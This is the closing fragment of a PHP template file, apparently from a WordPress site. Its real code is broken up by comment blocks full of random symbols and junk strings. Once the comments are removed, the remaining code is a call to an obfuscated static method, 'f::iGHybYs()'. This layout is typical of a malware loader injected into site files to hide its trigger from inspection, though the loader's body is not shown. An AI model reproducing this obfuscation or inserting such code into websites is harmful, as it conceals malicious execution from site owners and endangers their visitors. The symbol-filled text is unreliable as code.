 endif;/*-hCva-*///
 }/*-skr=-*///
}/*-

✷≴﹣➻☋®▁Φ㊑큐ⅷ℅∗☊⋹』⋊∔㈢Ⓨ╢♮ℍ⒰⒚⋋⑹

H;✷≴﹣➻☋®▁Φ㊑큐ⅷ℅∗☊⋹』⋊∔㈢Ⓨ╢♮ℍ⒰⒚⋋⑹

-*///
f/*-


≙☳③ⓧ⋺≅┳⊰−↺◤☬⒚Ⅻ⋤⒒⇝﹦≨


[~ZG#O≙☳③ⓧ⋺≅┳⊰−↺◤☬⒚Ⅻ⋤⒒⇝﹦≨


-*///
::/*-

⊙➨◿㏑▬♓♛⋥ℝ➓┈⋬ℑ╧

^+ciV)⊙➨◿㏑▬♓♛⋥ℝ➓┈⋬ℑ╧

-*///
iGHybYs/*-+4-*///
();/*-
❿ℳ♨⒭➙▔⌖♘◼℅⊿≋⒫☭┓⒕⌘▿
%+i5>f0I)9❿ℳ♨⒭➙▔⌖♘◼℅⊿≋⒫☭┓⒕⌘▿
-*///
 ?>